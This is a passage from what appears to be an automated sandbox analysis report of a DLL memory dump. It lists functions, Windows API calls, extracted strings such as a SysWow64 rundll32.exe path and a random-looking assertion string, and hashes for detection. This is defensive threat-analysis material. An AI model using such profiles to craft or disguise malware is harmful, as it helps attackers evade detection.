assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi, xrefs: 6E442BE8

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocExclusiveHeapLock$AcquireProcessRelease
String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi
API String ID: 3228198226-2044759171
Opcode ID: 2764c59464ed15e3ef8caecb67b9094c8a418e7bef8fc91c3bdce64c17b6e8b0
Instruction ID: c6a1fef3bba003196ea6e9eeecabc788918ab9653f5b48fdc15dccf1b1370f37
Opcode Fuzzy Hash: 2764c59464ed15e3ef8caecb67b9094c8a418e7bef8fc91c3bdce64c17b6e8b0
Instruction Fuzzy Hash: B64145B1A0024A8FEB50DFE4D854F9EBBB5FF49318F20412AD519AB380DB759949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E44CCFF, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E44CA41,6E44A8E2,6E44A0EC,?,6E44A324,?,00000001,?,?,00000001,?,6E487DA8,0000000C,6E44A41D), ref: 6E44CD0D
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E44CD1B
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E44CD34
SetLastError.KERNEL32(00000000,6E44A324,?,00000001,?,?,00000001,?,6E487DA8,0000000C,6E44A41D,?,00000001,?), ref: 6E44CD86

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3bc03e8c77e7c2f45e3e734afe1d8e919d82fd394f0b56c32eb49867c2c7d86a
Instruction ID: cac746401738f2df560c376e0f1e8366a3db773e776756d3d857051a4b16d6f3
Opcode Fuzzy Hash: 3bc03e8c77e7c2f45e3e734afe1d8e919d82fd394f0b56c32eb49867c2c7d86a
Instruction Fuzzy Hash: B801F572319E11EEFB9435F97C88D872A58EF47BB8B30032FE528582D0EF61C8055590

Uniqueness

Uniqueness Score: -1.00%

Function 6E4497A0, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 6E449E50: GetTickCount64.KERNEL32(00000001,?,?,00000000,?,?,?,6E4497B7), ref: 6E449E57

GetTickCount64.KERNEL32 ref: 6E4497D6
GetTickCount64.KERNEL32 ref: 6E4497F4
GetTickCount64.KERNEL32 ref: 6E44980D
GetTickCount64.KERNEL32 ref: 6E44980F
GetTickCount64.KERNEL32 ref: 6E449816
GetTickCount64.KERNEL32 ref: 6E449834

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: da5e0ea656505b26f58b4b7019270757374ef022abebddcf8ca7af92494d8572
Instruction ID: 7238fe4bc40e559617e70c2c4352938362ce25e3b5e0bc8456098daec3393faa
Opcode Fuzzy Hash: da5e0ea656505b26f58b4b7019270757374ef022abebddcf8ca7af92494d8572
Instruction Fuzzy Hash: BC019213D30E18CDE203BA7AA842646A7ADAF973E4F11D317D04A77002FF9154E396A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E436D10, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6E436DEB
__aulldiv.LIBCMT ref: 6E436DFB

Strings

{invalid syntax}, xrefs: 6E436D54
'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E436D24
_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6E436D7A, 6E436DB5

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv__aullrem
String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
API String ID: 3839614884-2364648981
Opcode ID: 151d0661e0e1db138ded2c95e39116634fbfa0d1342bd072993639739024bd93
Instruction ID: 849cc2894dcb30641258fb08407e42fc834228809791738e4b0f8c61bc83fbfe
Opcode Fuzzy Hash: 151d0661e0e1db138ded2c95e39116634fbfa0d1342bd072993639739024bd93
Instruction Fuzzy Hash: 4B41BB707182214BE724CABAD881F6AB6D5DF8C745F20493FE9898F3C5E665C815C3E2

Uniqueness

Uniqueness Score: -1.00%

Function 6E43D1B0, Relevance: 8.8, APIs: 7, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6E43D1BB
TlsGetValue.KERNEL32 ref: 6E43D1D3
TlsGetValue.KERNEL32 ref: 6E43D1F3
TlsGetValue.KERNEL32 ref: 6E43D213
GetProcessHeap.KERNEL32 ref: 6E43D226
HeapAlloc.KERNEL32(00260000,00000000,0000000C), ref: 6E43D239
TlsSetValue.KERNEL32(00000000,00000000,00260000,00000000,0000000C), ref: 6E43D266

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$Heap$AllocProcess
String ID:
API String ID: 3559649508-0
Opcode ID: 3ac97879d27be81e0299aa6b983e5ef48780020e4909c5345fcf85b2572843ac
Instruction ID: fcd80f79db881f9cf63e246a5de4b16b2daa87f9b725735e05eab21146252325
Opcode Fuzzy Hash: 3ac97879d27be81e0299aa6b983e5ef48780020e4909c5345fcf85b2572843ac
Instruction Fuzzy Hash: 5C116371701722CBEFA06FF69854F17379CAF0B645F22482AD901D7381DB75D8409AA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E450EB1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Windows\SysWow64\rundll32.exe, xrefs: 6E450ECD

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWow64\rundll32.exe
API String ID: 0-2424475261
Opcode ID: cf874dfa0b6d2fd188b71026d565180efa60698646ec92e3175449777c24b3f9
Instruction ID: 6667ab54056cb05c986f60d047a925c406c257258eb8281472e93cae39a972b2
Opcode Fuzzy Hash: cf874dfa0b6d2fd188b71026d565180efa60698646ec92e3175449777c24b3f9
Instruction Fuzzy Hash: A1216F36618209BF9750AFF58840D9B77BDEF4536C711492AE81497344FBB0E861C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E44EC2D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,06C8980B,00000000,?,00000000,6E457473,000000FF,?,6E44EBBD,?,?,6E44EB91,?), ref: 6E44EC62
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00000000,6E457473,000000FF,?,6E44EBBD,?,?,6E44EB91,?), ref: 6E44EC74
FreeLibrary.KERNEL32(00000000,?,00000000,6E457473,000000FF,?,6E44EBBD,?,?,6E44EB91,?), ref: 6E44EC96

Strings

CorExitProcess, xrefs: 6E44EC6C
mscoree.dll, xrefs: 6E44EC5B

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 92dc67a6317a5b9f7437d3933d003cde9da79d135f429a4153d06bd66fa0b90b
Instruction ID: 8138907c82ca1ce8cd4b6f8afe16f66f5b3e8cf797ee2d44291bdf963ed7feeb
Opcode Fuzzy Hash: 92dc67a6317a5b9f7437d3933d003cde9da79d135f429a4153d06bd66fa0b90b
Instruction Fuzzy Hash: 5D016772914A55EFDF019FA0DD49FAFBBB9FB09B11F004526E811A6390DB74E500CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E43C440, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6E43C445
GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6E43C455

Strings

SetThreadDescription, xrefs: 6E43C44F
kernel32, xrefs: 6E43C440

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: SetThreadDescription$kernel32
API String ID: 1646373207-1950310818
Opcode ID: 347cf47a1605de98147b6d8d3b13c7a455c765f57fcb568260e8195546ba4e2a
Instruction ID: 6f9178b4d9b2bacfbb9ae672ff90d5ac040d8d9d44395ba63680476d9eadebae
Opcode Fuzzy Hash: 347cf47a1605de98147b6d8d3b13c7a455c765f57fcb568260e8195546ba4e2a
Instruction Fuzzy Hash: 5CB092B1620E5167BEA1BFF35D1CE673B59E96AA913038462E111E9200CE20C0009DB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E43C460, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6E43C465
GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6E43C475

Strings

WakeByAddressSingle, xrefs: 6E43C46F
api-ms-win-core-synch-l1-2-0, xrefs: 6E43C460

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1731903895
Opcode ID: 5994f41794cd71ecb8196bcb20162386abe9e69fbfa755344547170497ca2183
Instruction ID: a1559ecda1d582756428615e3f71b1766752541bb211a5346eb8835edcf7b820
Opcode Fuzzy Hash: 5994f41794cd71ecb8196bcb20162386abe9e69fbfa755344547170497ca2183
Instruction Fuzzy Hash: EAB09271664A51669EA0BEF25D0CE563A28A99FA1630284A2A161D9280CE20C000DDB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E43C420, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6E43C425
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6E43C435

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6E43C42F
kernel32, xrefs: 6E43C420

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemTimePreciseAsFileTime$kernel32
API String ID: 1646373207-392834919
Opcode ID: f67067dbd40b0d19a80eca930b54196d46666d3d0a98e9a27bb254557248e04e
Instruction ID: e789bf03ca56f1dd947385e94a63cf781d74feb9a941adbd89f41d546fcb8a00
Opcode Fuzzy Hash: f67067dbd40b0d19a80eca930b54196d46666d3d0a98e9a27bb254557248e04e
Instruction Fuzzy Hash: 8BB09271620E5266AEE1BFF35E0CE5B3A1AA9AAA913038462E011E9201CE20C00099B1

Uniqueness

Uniqueness Score: -1.00%

Function 6E43C4C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6E43C4C5
GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6E43C4D5

Strings

NtCreateKeyedEvent, xrefs: 6E43C4CF
ntdll, xrefs: 6E43C4C0

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtCreateKeyedEvent$ntdll
API String ID: 1646373207-1373576770
Opcode ID: 1a39049c1f5ddd1d8a2628ec1b24c91747ed1bae3f00d6ca9430bf480b34ac74
Instruction ID: 9fed7b174e1030f971785a4a01e4e5a731a8a8f97ca190d718ab1ce23bd9b5c3
Opcode Fuzzy Hash: 1a39049c1f5ddd1d8a2628ec1b24c91747ed1bae3f00d6ca9430bf480b34ac74
Instruction Fuzzy Hash: 54B09271624A916A9EA07EF26D0CE563B29A94AB153028462E016EA641CE20C000E972

Uniqueness

Uniqueness Score: -1.00%

Function 6E43C4E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6E43C4E5
GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6E43C4F5

Strings

WaitOnAddress, xrefs: 6E43C4EF
api-ms-win-core-synch-l1-2-0, xrefs: 6E43C4E0

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1891578837
Opcode ID: bc8408c128a62c182b0a60cbfe4cf4090c176692647e2dd0fd50df9f7043625b
Instruction ID: 922f3735666569990460de087788748380c2dcc1e8be8a6205e6ac71db637441
Opcode Fuzzy Hash: bc8408c128a62c182b0a60cbfe4cf4090c176692647e2dd0fd50df9f7043625b
Instruction Fuzzy Hash: 72B09271634A52669EB07EF35E0CE563B28A96AA1A3028462E412E9240CE20C000DD71

Uniqueness

Uniqueness Score: -1.00%

Function 6E43C480, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6E43C485
GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6E43C495

Strings

ntdll, xrefs: 6E43C480
NtWaitForKeyedEvent, xrefs: 6E43C48F

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtWaitForKeyedEvent$ntdll
API String ID: 1646373207-2815205136
Opcode ID: 430d066217a75405795c64bcbb1656b22b47229da3fdc9b87274a473bdf7efc2
Instruction ID: 9a1a6394ab93755a0df05e557754d5ac28ede5b4f6972816419aab57239d0a8b
Opcode Fuzzy Hash: 430d066217a75405795c64bcbb1656b22b47229da3fdc9b87274a473bdf7efc2
Instruction Fuzzy Hash: 6EB09271624B61669EA0BEF26D0CE563B28A94BA153028462E01AE9200CE20D000EDB2

Uniqueness

Uniqueness Score: -1.00%

Function 6E43C4A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6E43C4A5
GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6E43C4B5

Strings

ntdll, xrefs: 6E43C4A0
NtReleaseKeyedEvent, xrefs: 6E43C4AF

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtReleaseKeyedEvent$ntdll
API String ID: 1646373207-31681898
Opcode ID: c2d410f0948c658f839641cf5caf35a776515523cea1ea5fe6bced067b77f202
Instruction ID: df4431a35c270616499c1d746d4461da18cf35b2cd94a11c0a9c0362520eb072
Opcode Fuzzy Hash: c2d410f0948c658f839641cf5caf35a776515523cea1ea5fe6bced067b77f202
Instruction Fuzzy Hash: 69B092B1624A51669EA07EF26D0CE963B28A94AB253028466E456E9200EE24C000E971

Uniqueness

Uniqueness Score: -1.00%

Function 6E454089, Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 6E4540EC

Part of subcall function 6E4519B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E453B22,?,00000000,-00000008), ref: 6E451A5F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E454347
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E45438F
GetLastError.KERNEL32 ref: 6E454432

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: aa620bf0c0933a7fd7831fb5dad707d890dd8451a0b2397c7630c5bd48bd8cca
Instruction ID: e71a65e1a9dbb252f285e58e86809fc9c5893357685d044cae24d1a20a6f9310
Opcode Fuzzy Hash: aa620bf0c0933a7fd7831fb5dad707d890dd8451a0b2397c7630c5bd48bd8cca
Instruction Fuzzy Hash: FED16875E002599FCB01CFE9C880AEDBBB5FF0A344F18452AE856AB351D730A962CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E44CDDF, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6E44CEA6
___AdjustPointer.LIBCMT ref: 6E44CEC9
___AdjustPointer.LIBCMT ref: 6E44CF65

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 139b1f4962f6c53834685a077cf76ba13a564a81df6d06a04c46f8812f9275fe
Instruction ID: 02b488cc12f471b61ec1db049448449f47abb6b456c2447c36311e884c39d8b0
Opcode Fuzzy Hash: 139b1f4962f6c53834685a077cf76ba13a564a81df6d06a04c46f8812f9275fe
Instruction Fuzzy Hash: B851CD72705606EFFB158FB5C850FAA73A8EF04304F29042FE8159A290EB35EC59CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4506C7, Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6E4519B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E453B22,?,00000000,-00000008), ref: 6E451A5F

GetLastError.KERNEL32 ref: 6E45072B
__dosmaperr.LIBCMT ref: 6E450732
GetLastError.KERNEL32(?,?,?,?), ref: 6E45076C
__dosmaperr.LIBCMT ref: 6E450773

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: f10710cb2eed90d72b2e7e6cf4b8a289bb337fdae4381e83a667274842ac7950
Instruction ID: 5d67dd46c45de295868a16714e94048c999bcd288d0e52fd4ed81b3855876602
Opcode Fuzzy Hash: f10710cb2eed90d72b2e7e6cf4b8a289bb337fdae4381e83a667274842ac7950
Instruction Fuzzy Hash: B8219539614605AF97609FF58880D9BB7BDEF453AC714892FE81897344EB70EC618F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4557E6, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 6E4557FD
GetLastError.KERNEL32(?,6E455197,?,00000001,?,?,?,6E454486,?,?,00000000,?,?,?,6E454A0D,?), ref: 6E455809

Part of subcall function 6E4557CF: CloseHandle.KERNEL32(FFFFFFFE), ref: 6E4557DF

___initconout.LIBCMT ref: 6E455819

Part of subcall function 6E455791: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 6E4557A4

WriteConsoleW.KERNEL32 ref: 6E45582E

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2d47dcc7950b0d10a1e69c941ea5fa639bec6f07cf6a6a975d0bf253b8f17fff
Instruction ID: bd3c10e721e940969e9691090caa3caeebec6eea05c5ead03cb63ac648d641cb
Opcode Fuzzy Hash: 2d47dcc7950b0d10a1e69c941ea5fa639bec6f07cf6a6a975d0bf253b8f17fff
Instruction Fuzzy Hash: AEF09E36510615FBCF522FE59C08D9A7F25FF0A6A1F054415FE1995210DA75C870DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E45493F, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6E454089: GetConsoleOutputCP.KERNEL32 ref: 6E4540EC

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E454AA8
GetLastError.KERNEL32(?,6E4527EE,?,}&En,00000000,?,00000000,6E45267D,?,00000000,00000000,6E488248,0000002C,6E4526EE,?), ref: 6E454AB2

Strings

'En, xrefs: 6E454B33

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID: 'En
API String ID: 2915228174-827958796
Opcode ID: 659cdf3476c03579d20660d94ef23585ed07c64f9f43491cbdbffdcf1d16f9d5
Instruction ID: 00866afab5d8228b1471289d4baa2e1f34f7c03f9133b00c56a2e0a60ee6ecea
